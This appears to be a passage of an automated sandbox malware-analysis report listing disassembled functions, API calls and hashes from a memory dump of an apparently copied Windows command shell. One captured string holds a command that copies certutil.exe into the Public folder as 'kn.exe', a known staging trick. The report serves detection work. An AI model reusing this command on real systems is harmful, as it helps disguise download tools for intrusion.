                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: wcschr$iswdigit
                                        • String ID: +-~!$<>+-*/%()|^&=,
                                        • API String ID: 2770779731-632268628
                                        • Opcode ID: 04afb1219d2367be7b294e05ecf67b56e7fd74584ee28e872d0024d55c3108eb
                                        • Instruction ID: a9853a7cba4e009d46bb94343a1f46c920237e00af50becf4b256b6b1526955a
                                        • Opcode Fuzzy Hash: 04afb1219d2367be7b294e05ecf67b56e7fd74584ee28e872d0024d55c3108eb
                                        • Instruction Fuzzy Hash: B8316C3270CE6685EA50AF52E450678B6A5FB59F94B858035DF6E03354FF3CE600C720
                                        Function 00007FF7CD4AD878 Relevance: 12.1, APIs: 8, Instructions: 89fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: File_get_osfhandle$Pointer$BuffersFlushRead
                                        • String ID:
                                        • API String ID: 3192234081-0
                                        • Opcode ID: 21cbebea3a03736acc453a065156524b21459c684ab1bf839b7458faa090dfc7
                                        • Instruction ID: 1354757dfc7729473c4899b9df5a711c3d22e25c901053b3378d111f80f399fd
                                        • Opcode Fuzzy Hash: 21cbebea3a03736acc453a065156524b21459c684ab1bf839b7458faa090dfc7
                                        • Instruction Fuzzy Hash: 32315E31B08A419BE710BF62A44467DFAA1FB89BA0F849134DF6A477A5EF3CD5018B10
                                        Function 00007FF7CD491630 Relevance: 10.7, APIs: 7, Instructions: 208memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,00000000,?,00007FF7CD4914D6,?,?,?,00007FF7CD48AA22,?,?,?,00007FF7CD48847E), ref: 00007FF7CD491673
                                        • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF7CD4914D6,?,?,?,00007FF7CD48AA22,?,?,?,00007FF7CD48847E), ref: 00007FF7CD49168D
                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF7CD4914D6,?,?,?,00007FF7CD48AA22,?,?,?,00007FF7CD48847E), ref: 00007FF7CD491757
                                        • HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF7CD4914D6,?,?,?,00007FF7CD48AA22,?,?,?,00007FF7CD48847E), ref: 00007FF7CD49176E
                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF7CD4914D6,?,?,?,00007FF7CD48AA22,?,?,?,00007FF7CD48847E), ref: 00007FF7CD491788
                                        • HeapSize.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF7CD4914D6,?,?,?,00007FF7CD48AA22,?,?,?,00007FF7CD48847E), ref: 00007FF7CD49179C
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: Heap$Process$Alloc$Size
                                        • String ID:
                                        • API String ID: 3586862581-0
                                        • Opcode ID: de24f60fade2ea1a8e9170476ea6e59d916578871a0233016ef2ac0a8793df42
                                        • Instruction ID: 3bb158a453407c2897abf5b9603a865e848544f43cfe243c414fe228f80c7f2d
                                        • Opcode Fuzzy Hash: de24f60fade2ea1a8e9170476ea6e59d916578871a0233016ef2ac0a8793df42
                                        • Instruction Fuzzy Hash: DA916F61B0DA4281EA14AF16A444678F7A6FB54BA1F998136DF6D037A0FF3CE641C320
                                        Function 00007FF7CD4986F0 Relevance: 10.7, APIs: 7, Instructions: 154COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: ConsoleErrorOpenTitleTokenwcsstr$CloseFormatFreeLastLocalMessageProcessStatusThread
                                        • String ID:
                                        • API String ID: 1313749407-0
                                        • Opcode ID: ee6218c461c646e929341b9db92bfc99d61f95d83b881389c5cff3e0ca217c2e
                                        • Instruction ID: 1bcc4565639b50edae71209ecfe99b6331be8da80bf3fd050cb50811b1912ebd
                                        • Opcode Fuzzy Hash: ee6218c461c646e929341b9db92bfc99d61f95d83b881389c5cff3e0ca217c2e
                                        • Instruction Fuzzy Hash: E751A222B0C68292EE10BF169904579E69ABF55BB0F884170DF3E073D5FF3CEA408620
                                        Function 00007FF7CD4AEC14 Relevance: 10.6, APIs: 7, Instructions: 121COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: Error$CurrentDirectoryModememset$EnvironmentLastVariable
                                        • String ID:
                                        • API String ID: 920682188-0
                                        • Opcode ID: 9d1635e35e3ac97de0e6528cece6faaa031c08ed2930d9ed60b369340f3def9a
                                        • Instruction ID: 4871ab34809e254ed3e6647ca1a2ac53cfb8967844ad9561a91dfcb0a98baa00
                                        • Opcode Fuzzy Hash: 9d1635e35e3ac97de0e6528cece6faaa031c08ed2930d9ed60b369340f3def9a
                                        • Instruction Fuzzy Hash: F4515832709B818AEB25EF21D8546E8B7A1FB88BA4F848039CE5E47754EF3CD645C710
                                        Function 00007FF7CD48DF60 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        • extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe , xrefs: 00007FF7CD48E00B
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: Heap$FreeProcess_setjmp
                                        • String ID: extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                                        • API String ID: 777023205-3344945345
                                        • Opcode ID: bbf52200d93ced3108c92f56beefed0410d329e72fd007d8cbedcbd411aea915
                                        • Instruction ID: 714be2d97abfb2d49bfe979a8675b3a43a655fcd095d660e249b2fe165984530
                                        • Opcode Fuzzy Hash: bbf52200d93ced3108c92f56beefed0410d329e72fd007d8cbedcbd411aea915
                                        • Instruction Fuzzy Hash: 08511C31F0DA528AEB54AF15A840578FAA0BF857B0FD44435DF6D862A1FF3DE6408720
                                        Function 00007FF7CD48F5D7 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 91COMMON
                                        Download Yara Rule
                                        APIs
                                        • iswspace.MSVCRT(00000000,00000000,?,00000000,?,00007FF7CD48E626,?,?,00000000,00007FF7CD491F69), ref: 00007FF7CD48F1BA
                                        • wcschr.MSVCRT(?,?,00000000,00007FF7CD491F69,?,?,?,?,?,?,?,00007FF7CD48286E,00000000,00000000,00000000,00000000), ref: 00007FF7CD48F1E7
                                        • iswdigit.MSVCRT(00000000,00000000,?,00000000,?,00007FF7CD48E626,?,?,00000000,00007FF7CD491F69), ref: 00007FF7CD48F1FF
                                        • iswdigit.MSVCRT(?,?,00000000,00007FF7CD491F69,?,?,?,?,?,?,?,00007FF7CD48286E,00000000,00000000,00000000,00000000), ref: 00007FF7CD48F2BB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: iswdigit$iswspacewcschr
                                        • String ID: )$=,;
                                        • API String ID: 1959970872-2167043656
                                        • Opcode ID: e8a5d63c360e4c13ef561f3ce3dd80187a3c2d8689f5c743dd181e811bfffbc3
                                        • Instruction ID: f2d1d8c6bb824f38342cbcc2516e693f9f01b0cfda586170e0a405a9edce7b86
                                        • Opcode Fuzzy Hash: e8a5d63c360e4c13ef561f3ce3dd80187a3c2d8689f5c743dd181e811bfffbc3
                                        • Instruction Fuzzy Hash: 59418A65F0C61385FBA46F119914279FAE0AF507A1FC45036CFAD821A4FF3CAA818B20
                                        Function 00007FF7CD4A91B8 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: _wcsnicmpfprintfwcsrchr
                                        • String ID: CMD Internal Error %s$%s$Null environment
                                        • API String ID: 3625580822-2781220306
                                        • Opcode ID: 9798a54e4fc5b33e689a2c9d89df2130ab496e8d723cbfb9f498f453c0192420
                                        • Instruction ID: 57bb31afaf0d2424bc72e3db52d07c6e157c05398a08f5ebf2dba76380eaa84e
                                        • Opcode Fuzzy Hash: 9798a54e4fc5b33e689a2c9d89df2130ab496e8d723cbfb9f498f453c0192420
                                        • Instruction Fuzzy Hash: 6A319C22B0CA4692EA14AF42A5001BAF2A5BB55BB4FC44535CF3D177A5FF3CE645C320
                                        Function 00007FF7CD491FAC Relevance: 9.3, APIs: 6, Instructions: 260COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: memsetwcsspn
                                        • String ID:
                                        • API String ID: 3809306610-0
                                        • Opcode ID: b301965ff12d262252dd12f41c330d116590c5451c87bac9252232e49858c122
                                        • Instruction ID: e945a3366756f0527f25becc40ad9beafd39f69a297922c428804036c8270bce
                                        • Opcode Fuzzy Hash: b301965ff12d262252dd12f41c330d116590c5451c87bac9252232e49858c122
                                        • Instruction Fuzzy Hash: 93B19161B0CA4286EA50AF16E490A7AB7A5FB84BA0FC48031CF6D47795FF7CD641C720
                                        Function 00007FF7CD4A8C18 Relevance: 9.1, APIs: 6, Instructions: 145COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: wcschr$iswdigit$wcstol
                                        • String ID:
                                        • API String ID: 3841054028-0
                                        • Opcode ID: c8e66ebebd8934775a16318260a5522f8ecbc9a094cbada97be1ab4c749f477c
                                        • Instruction ID: 2a25ac5ab0e2ff0fb4accf102f4521f1276134f513d09e0c62e6d60478b72762
                                        • Opcode Fuzzy Hash: c8e66ebebd8934775a16318260a5522f8ecbc9a094cbada97be1ab4c749f477c
                                        • Instruction Fuzzy Hash: E951B366B0C69291EB64AF2594101B9F6A1FF68B74BC48231DF7D422D4FF3CA652C620
                                        Function 00007FF7CD485984 Relevance: 9.1, APIs: 6, Instructions: 142COMMON
                                        Download Yara Rule
                                        APIs
                                        • _get_osfhandle.MSVCRT ref: 00007FF7CD4A3687
                                        • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00008000,?,00000001,00007FF7CD48260D), ref: 00007FF7CD4A36A6
                                        • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00008000,?,00000001,00007FF7CD48260D), ref: 00007FF7CD4A36EB
                                        • _get_osfhandle.MSVCRT ref: 00007FF7CD4A3703
                                        • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00008000,?,00000001,00007FF7CD48260D), ref: 00007FF7CD4A3722
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: Console$Write_get_osfhandle$Mode
                                        • String ID:
                                        • API String ID: 1066134489-0
                                        • Opcode ID: 4c1f695bad35c7bf589eba106c736ecb6e681f2494b966e2c9ca81186bfba4b7
                                        • Instruction ID: 022ce2fb92146cd8f8fea4f2fd6e3476d8d3365ed06e4303bfc5bf7ab642500d
                                        • Opcode Fuzzy Hash: 4c1f695bad35c7bf589eba106c736ecb6e681f2494b966e2c9ca81186bfba4b7
                                        • Instruction Fuzzy Hash: E851B765B0C64297EA246F51A408579F692FF547B4F888435DF2E43790FF3CE6408B20
                                        Function 00007FF7CD4889C0 Relevance: 9.1, APIs: 6, Instructions: 85COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: memset$DriveErrorInformationLastTypeVolume
                                        • String ID:
                                        • API String ID: 850181435-0
                                        • Opcode ID: 41e637cf901b3345656d12757c0875431f92b4df5430d67bb2a32cad95087ec1
                                        • Instruction ID: dbcf1004a4bf246e01c8b7cc3b56b60156aa305da354e0296cba6286dcce7357
                                        • Opcode Fuzzy Hash: 41e637cf901b3345656d12757c0875431f92b4df5430d67bb2a32cad95087ec1
                                        • Instruction Fuzzy Hash: E5415B32608AC1CAE7609F21E8442F9B7A5FB89B94F844125DF5D8BB48EF38D645C720
                                        Function 00007FF7CD4934A0 Relevance: 9.1, APIs: 6, Instructions: 84COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00007FF7CD493578: _get_osfhandle.MSVCRT ref: 00007FF7CD493584
                                          • Part of subcall function 00007FF7CD493578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF7CD4832E8,?,?,?,?,?,?,?,?,0000000A,?,00000000,00000014), ref: 00007FF7CD49359C
                                          • Part of subcall function 00007FF7CD493578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF7CD4832E8,?,?,?,?,?,?,?,?,0000000A,?,00000000,00000014), ref: 00007FF7CD4935C3
                                          • Part of subcall function 00007FF7CD493578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7CD4832E8,?,?,?,?,?,?,?,?,0000000A,?,00000000,00000014), ref: 00007FF7CD4935D9
                                          • Part of subcall function 00007FF7CD493578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF7CD4832E8,?,?,?,?,?,?,?,?,0000000A,?,00000000,00000014), ref: 00007FF7CD4935ED
                                          • Part of subcall function 00007FF7CD493578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7CD4832E8,?,?,?,?,?,?,?,?,0000000A,?,00000000,00000014), ref: 00007FF7CD493602
                                        • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00000000,00007FF7CD493491,?,?,00000000,00007FF7CD4A4420), ref: 00007FF7CD493514
                                        • _get_osfhandle.MSVCRT ref: 00007FF7CD493522
                                        • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,00000000,00007FF7CD493491,?,?,00000000,00007FF7CD4A4420), ref: 00007FF7CD493541
                                        • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00000000,00007FF7CD493491,?,?,00000000,00007FF7CD4A4420), ref: 00007FF7CD49355E
                                          • Part of subcall function 00007FF7CD4936EC: _get_osfhandle.MSVCRT ref: 00007FF7CD493715
                                          • Part of subcall function 00007FF7CD4936EC: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF7CD493770
                                          • Part of subcall function 00007FF7CD4936EC: WriteFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7CD493791
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: LockShared$_get_osfhandle$AcquireConsoleFileReleaseWrite$ByteCharHandleModeMultiTypeWide
                                        • String ID:
                                        • API String ID: 4057327938-0
                                        • Opcode ID: 88fe3d8dcb1b39454ed35e4d5bc75a190f5634e19a67efeee45e7c5e6c767e8c
                                        • Instruction ID: 45aa16ecfd703868d3956d7e2ccee087d4e00b15fc5e071b2a6107f2468b65ca
                                        • Opcode Fuzzy Hash: 88fe3d8dcb1b39454ed35e4d5bc75a190f5634e19a67efeee45e7c5e6c767e8c
                                        • Instruction Fuzzy Hash: B8317221B0CA4296E750BF669405479F6A6EF89760FD84135DF6E43395FE3CEA048720
                                        Function 00007FF7CD4ABE30 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 60COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
